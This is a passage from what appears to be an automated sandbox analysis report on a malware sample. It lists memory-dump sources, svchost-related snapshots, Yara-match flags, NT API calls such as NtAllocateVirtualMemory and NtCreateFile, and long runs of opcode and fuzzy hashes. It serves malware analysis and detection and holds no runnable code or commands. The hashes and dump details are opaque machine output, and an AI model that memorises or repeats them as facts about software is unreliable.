                                                                                                                                • Instruction Fuzzy Hash: 45F0A974A05228CFDB64CF64D980B98BBB2BB1A301F1041DAE849AB341CB749E81CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6174cce8f18c879cbcaa11832ad0b3659ed5976e6df7b1cf7fbdecc1f7b44c91
                                                                                                                                • Instruction ID: 753914f3b3e1b2bdf2099c231864e2925a4f0e422ec82849b12a11ce55218127
                                                                                                                                • Opcode Fuzzy Hash: 6174cce8f18c879cbcaa11832ad0b3659ed5976e6df7b1cf7fbdecc1f7b44c91
                                                                                                                                • Instruction Fuzzy Hash: 27215EB1C083898FDB11CFAAC8447DEBFF0AF4A224F14859ED495AB252D3756905CF61

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:25.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:3
                                                                                                                                Total number of Limit Nodes:0

                                                                                                                                Callgraph


                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.4587208123.0000000007370000.00000040.80000000.00040000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_7370000_IEFVDUdSaLLhw.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: socket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 98920635-0
                                                                                                                                • Opcode ID: 9062912267aaa5036353cdc5aa087de866e5d9df055dcdab7c6e1ccba327a24a
                                                                                                                                • Instruction ID: d6557c4f732c9edbe690f91f44212b638ad4d87cfdb4a4b1c401c502a6f587c8
                                                                                                                                • Opcode Fuzzy Hash: 9062912267aaa5036353cdc5aa087de866e5d9df055dcdab7c6e1ccba327a24a
                                                                                                                                • Instruction Fuzzy Hash: 065159B1E14158DFDB09CF98D590AACBBF6BF49314F188099E81AA7391C7346E42CF50

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:2.6%
                                                                                                                                Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                                Signature Coverage:1.5%
                                                                                                                                Total number of Nodes:455
                                                                                                                                Total number of Limit Nodes:72
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 007CC484
                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 007CC4BF
                                                                                                                                • FindClose.KERNELBASE(?), ref: 007CC4CA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                • Opcode ID: 2b64eb2928cc5b1944b9f56013d7d6aeaee1ce2181abdc24f400fb93738e2edf
                                                                                                                                • Instruction ID: d5d302d65e1b215b2a288e7d92b40ee3c65cd709ee4cc5251a2fecbf17fe1a04
                                                                                                                                • Opcode Fuzzy Hash: 2b64eb2928cc5b1944b9f56013d7d6aeaee1ce2181abdc24f400fb93738e2edf
                                                                                                                                • Instruction Fuzzy Hash: 2531A172900298BBDB25DBA0CC89FFF777CAF44745F10449DF90CA6191DA74AB858BA0
                                                                                                                                APIs
                                                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,1864B88E,?,?), ref: 007D8F4E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 823142352-0
                                                                                                                                • Opcode ID: c24f852a5a05263fa82ddd60a235b99f3fcb2b00884e91ce51f06d694029dd12
                                                                                                                                • Instruction ID: 2c8b8cbe3c2680e7ac56854dbb7435bd7976b088b9fb4e8157cda23ace8be685
                                                                                                                                • Opcode Fuzzy Hash: c24f852a5a05263fa82ddd60a235b99f3fcb2b00884e91ce51f06d694029dd12
                                                                                                                                • Instruction Fuzzy Hash: 7231C2B5A00248AFCB14DF99C881EEEB7B9EF88300F508619F919A7344D734A911CFA5
                                                                                                                                APIs
                                                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,1864B88E), ref: 007D90A3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                • Opcode ID: c7ec65dbe847129dae18479642e5c0b22711648c0a0c7b1f9475e5c277fa4d88
                                                                                                                                • Instruction ID: e752d5889df4a4030fdf15b258fb4c74d59531648f8f4eded7002f9dd08bbaf1
                                                                                                                                • Opcode Fuzzy Hash: c7ec65dbe847129dae18479642e5c0b22711648c0a0c7b1f9475e5c277fa4d88
                                                                                                                                • Instruction Fuzzy Hash: FB31F6B5A00248AFCB14DF98C841EEFB7B9EF88304F108619F919A7345D774A911CFA1
                                                                                                                                APIs
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(007C1AEE,?,007D7DCF,00000000,00000004,00003000,?,?,?,?,?,007D7DCF,007C1AEE), ref: 007D9375
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                • Opcode ID: d24d7489f34dda0f62bfdf744e8e1e84ae437e7e7a432dbf1f54f11caae97b18
                                                                                                                                • Instruction ID: 9e9041e6d87249d58ecd85f15ce4c9060b6b9554ac2a3886f51b659ad7dac5e6
                                                                                                                                • Opcode Fuzzy Hash: d24d7489f34dda0f62bfdf744e8e1e84ae437e7e7a432dbf1f54f11caae97b18
                                                                                                                                • Instruction Fuzzy Hash: 8221F7B5A00208AFDB14DF98CC45EEF77B9EF88700F10461AF919A7281D774A911CBA5
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: bb2156a930fcda6a2dd67b11b201b524c73f67881e9d55ed75918eaa45964ca6
                                                                                                                                • Instruction ID: b98e8976f46aabb49ac809c58e38b1a468eb4b7d0f18e7023efeb6a9975b9b32
                                                                                                                                • Opcode Fuzzy Hash: bb2156a930fcda6a2dd67b11b201b524c73f67881e9d55ed75918eaa45964ca6
                                                                                                                                • Instruction Fuzzy Hash: 7F115E71600208BFD720EB69CC06FEB77BCEF85704F50851DFA09A7281E7B56A058BA5
                                                                                                                                APIs
                                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 007D9184
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                • Opcode ID: e2330e1e311a6ff0016a626a075a4b11d39da747239e512168a5ca50c78264f5
                                                                                                                                • Instruction ID: b686ec21bbf7e1c7fd8914652d81ad371038738840bf086f42187bd67a713673
                                                                                                                                • Opcode Fuzzy Hash: e2330e1e311a6ff0016a626a075a4b11d39da747239e512168a5ca50c78264f5
                                                                                                                                • Instruction Fuzzy Hash: 58E04636200204BFD620FA5ADC45FAB776CEBC6760F408416FA1CA7242D671B90086F0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 663ba2ca6556a154c2dc122cf02178b7a890628afd0aaab7784bfa8ced465476
                                                                                                                                • Instruction ID: 79c36234720274889e510d8a999a0b7425fa70a0e924b407cdc8139bfc2788b4
                                                                                                                                • Opcode Fuzzy Hash: 663ba2ca6556a154c2dc122cf02178b7a890628afd0aaab7784bfa8ced465476
                                                                                                                                • Instruction Fuzzy Hash: 86900231705804129140B25858C45864046E7E0311B99C011E4425559C8B148A565361
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: d62b8dc2a93950c841b4bb49021e758ec2c8099ece53ed4989248a87205dbd56
                                                                                                                                • Instruction ID: 1cdd0faeda76bb7300b6d1cc02c03c9f7f8ea72854ff8eb6bf320c4417342635
                                                                                                                                • Opcode Fuzzy Hash: d62b8dc2a93950c841b4bb49021e758ec2c8099ece53ed4989248a87205dbd56
                                                                                                                                • Instruction Fuzzy Hash: 29900261701504424140B25858444466046E7E13113D9C115A4555565C871889559269
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 6a8905976415fcc6c7416a0814b0aee926e7f0e0d53648d577d0a993153a632d
                                                                                                                                • Instruction ID: 457c78abb18feeb14149725498e1d226c4b2eaf328586fb1b4f1f17e32bb03f2
                                                                                                                                • Opcode Fuzzy Hash: 6a8905976415fcc6c7416a0814b0aee926e7f0e0d53648d577d0a993153a632d
                                                                                                                                • Instruction Fuzzy Hash: DA900261302404034105B2585454656404BD7E0311B99C021E5015595DC62589916125
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: aecd7f88243f29b6cd407874b902b30b057c76207dbb9c0468c5112da7000b44
                                                                                                                                • Instruction ID: b3436e42d3914cf4c4cb3cffb2d4153c9b23ff6f79605a2cb47885fd604d6d6c
                                                                                                                                • Opcode Fuzzy Hash: aecd7f88243f29b6cd407874b902b30b057c76207dbb9c0468c5112da7000b44
                                                                                                                                • Instruction Fuzzy Hash: 9790023130140C02D180B258544468A0046D7D1311FD9C015A4026659DCB158B5977A1
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: fc01f1a61899e8641ba18a06eb7508c983c62ec380395e250a57f386bca51718
                                                                                                                                • Instruction ID: feb61bbf589ed7805aec5d32ddd0d2438b9dcaf2427a6c7edc2e677004227c0c
                                                                                                                                • Opcode Fuzzy Hash: fc01f1a61899e8641ba18a06eb7508c983c62ec380395e250a57f386bca51718
                                                                                                                                • Instruction Fuzzy Hash: BD90023130544C42D140B2585444A860056D7D0315F99C011A4065699D97258E55B661
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: dfa9a5f5860a7941eecd4de34c7f4d36b4a3187a52665dae140885d0e2d1378d
                                                                                                                                • Instruction ID: 159e6b9a8c87ab6772aef97436f84bc157bd74f3fc7ec69429bb47341f37a4f7
                                                                                                                                • Opcode Fuzzy Hash: dfa9a5f5860a7941eecd4de34c7f4d36b4a3187a52665dae140885d0e2d1378d
                                                                                                                                • Instruction Fuzzy Hash: D390023170540C02D150B25854547860046D7D0311F99C011A4025659D87558B5576A1
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 5d97abc56b7be79a5c6e4baed7a2543d8db4995a4c6c3cf4ea583f10a3a2489a
                                                                                                                                • Instruction ID: bb2d9ff60167903135882ab1c6a3556c71aab08f7e172c41589b85a04ffa86f1
                                                                                                                                • Opcode Fuzzy Hash: 5d97abc56b7be79a5c6e4baed7a2543d8db4995a4c6c3cf4ea583f10a3a2489a
                                                                                                                                • Instruction Fuzzy Hash: DD900435311404030105F75C174454700C7D7D53713DDC031F5017555CD731CD715131
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 9f544d5bca54e2105390a3ad8a924ac7d92ee70f6596dbef0e5c9d34ca21a86a
                                                                                                                                • Instruction ID: 62eee3e28032652a3cee3761c5cd73f479c45e7deb2fa4ef879cd2002161097d
                                                                                                                                • Opcode Fuzzy Hash: 9f544d5bca54e2105390a3ad8a924ac7d92ee70f6596dbef0e5c9d34ca21a86a
                                                                                                                                • Instruction Fuzzy Hash: 71900225321404020145F658164454B0486E7D63613D9C015F5417595CC72189655321
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: a6a5813f2353bf39e4a152bb67d1d85241ec24c8eba7929ecfd1f5e973676432
                                                                                                                                • Instruction ID: 6d5b222a0f62db53fc5b95ab31557e7ee5b50262cf3aab6058fa01a1d96d82b1
                                                                                                                                • Opcode Fuzzy Hash: a6a5813f2353bf39e4a152bb67d1d85241ec24c8eba7929ecfd1f5e973676432
                                                                                                                                • Instruction Fuzzy Hash: F090026134140842D100B2585454B460046D7E1311F99C015E5065559D8719CD526126
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 5552ff27ed38fdf7b8b2579f1b4c43cbead5f11e14f8c9866c7f681bd5754c47
                                                                                                                                • Instruction ID: eae4651246cda45a2ccbe3c396d0afd765965ca343e324362d4f29e71bd95b34
                                                                                                                                • Opcode Fuzzy Hash: 5552ff27ed38fdf7b8b2579f1b4c43cbead5f11e14f8c9866c7f681bd5754c47
                                                                                                                                • Instruction Fuzzy Hash: 15900221311C0442D200B6685C54B470046D7D0313F99C115A4155559CCA1589615521
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 1ee8d4dfd1c0b376ff5c8482859030c79dd521c769bf5c0e423878235c464d2f
                                                                                                                                • Instruction ID: 5dde4f39399ffbcb89e53f09c5812cf7512857b0504eec7f22b9ae50fcd4ae15
                                                                                                                                • Opcode Fuzzy Hash: 1ee8d4dfd1c0b376ff5c8482859030c79dd521c769bf5c0e423878235c464d2f
                                                                                                                                • Instruction Fuzzy Hash: 57900221701404424140B26898849464046FBE1321799C121A4999555D865989655665
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 4466e5728bb890779200661bf0e38b72581c818b84f28d3acd28e8511bc5a467
                                                                                                                                • Instruction ID: 957ebda07f91b14d52a41c8cbd5ace61a48632d2c21951bdcd93ff4b771760cc
                                                                                                                                • Opcode Fuzzy Hash: 4466e5728bb890779200661bf0e38b72581c818b84f28d3acd28e8511bc5a467
                                                                                                                                • Instruction Fuzzy Hash: DF90026130180803D140B65858446470046D7D0312F99C011A606555AE8B298D516135
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 388da6fcac4a14600bcf289742667d1aadabd12a3c557ee136350d8449854584
                                                                                                                                • Instruction ID: 2854e459298965992e089223f5fe7da0ffbabcac43467303c941df2e6f18af77
                                                                                                                                • Opcode Fuzzy Hash: 388da6fcac4a14600bcf289742667d1aadabd12a3c557ee136350d8449854584
                                                                                                                                • Instruction Fuzzy Hash: 5590022170140902D101B2585444656004BD7D0351FD9C022A502555AECB258A92A131
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 8337b097b2ae4b62bca3a4e6b87dfb40b3904bebf806f6004bedfa3e88184bd5
                                                                                                                                • Instruction ID: a66a380f2618cf76aed092c2962f9eb370a9acc3360d389fd048201e447ead72
                                                                                                                                • Opcode Fuzzy Hash: 8337b097b2ae4b62bca3a4e6b87dfb40b3904bebf806f6004bedfa3e88184bd5
                                                                                                                                • Instruction Fuzzy Hash: 6590022931340402D180B258644864A0046D7D1312FD9D415A401655DCCA1589695321
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 79a638b3c366cdf25c270388efdddbc0e11318d457a420637c75b6566de9044a
                                                                                                                                • Instruction ID: 02f3288c67d0b8e74ae7417ae34ee6e3f84eda75accf350528d982ea127402e2
                                                                                                                                • Opcode Fuzzy Hash: 79a638b3c366cdf25c270388efdddbc0e11318d457a420637c75b6566de9044a
                                                                                                                                • Instruction Fuzzy Hash: B790022130140403D140B25864586464046E7E1311F99D011E4415559CDA1589565222
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
